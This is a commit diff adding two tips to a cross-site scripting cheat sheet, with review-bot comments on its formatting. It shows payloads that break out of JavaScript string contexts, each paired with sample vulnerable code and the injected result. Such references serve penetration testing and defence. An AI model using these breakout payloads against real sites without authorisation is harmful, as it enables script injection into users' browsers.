Add 2 tips
Muhammad Daffa 2020-09-14 10:02:32 +07:00 committed by GitHub
parent 203e78791a
commit ef653c3092
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

59
XSS.md

@ -113,6 +113,13 @@
\'alert(1)//
```
* Example source code
```html
<script>
var sitekey = 'REFLECTED_HERE';
</script>
```
* If we input payload '-alert(1)-' it will be like this
```html
<script>
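Review bot: The added bullet "If we input payload '-alert(1)-' it will be like this" leaves the payload as bare text, while the payloads around it sit in code fences, so a Markdown renderer may turn the straight quotes into typographic ones and the string a reader copies will not match what is shown. Put it in a code span and tighten the wording, for example: If we input the payload `'-alert(1)-'`, the output looks like this. The new "Example source code" block would also read better with one sentence saying that this is the case where the application escapes quotes with a backslash, since that explanation only appears after the block.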
@ -124,9 +131,59 @@ The quotes are escaped by a backslash so we need to bypass them
* After input the payload
```html
<script>
var sitekey = '\'alert(1)//';
var sitekey = '\\'alert(1)//';
</script>
```
9. Use when theres multi reflection in the same line of JS code
```html
/alert(1)//\
/alert(1)}//\
```
* Example source code
```html
<script>
var a = 'REFLECTED_HERE'; var b = 'REFLECTED_HERE';
</script>
```
* After input the payload
```html
<script>
var a = '/alert(1)//\'; var b = '/alert(1)//\';
</script>
```
10. Use when input inside a string delimited value and inside a single logical block like function or conditional (if, else, etc).
```html
'}alert(1);{'
\'}alert(1);{//
```
* Example source code
```html
<script>
var greeting;
var time = 1;
if (time < 10) {
test = 'REFLECTED_HERE';
}
</script>
```
* After input the payload
```html
<script>
var test;
var time = 1;
if (time < 10) {
test = ''}alert(1);{'';
}
</script>
```
> Payload number 2 uses when quote escaped by backslash
*Will be updated again!
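Review bot: The tip 10 example is inconsistent between its two blocks: the "Example source code" block declares `var greeting;` but assigns to `test`, while the "After input the payload" block declares `var test;`. Use one variable name in both so the reader can see that only the reflected string changed. In tip 9 the second payload `/alert(1)}//\` has no "After input" block and no note on when the `}` variant applies, and in tip 10 the closing quote says payload number 2 is for backslash-escaped quotes without showing the resulting output; either add the matching output for each or drop the variant. Smaller points: "theres multi reflection" should read "there are multiple reflections", "Payload number 2 uses when quote escaped" should read "Payload number 2 is used when the quote is escaped", the payload-only fences are tagged `html` although they contain no HTML, and the last line `*Will be updated again!` opens emphasis with `*` and never closes it.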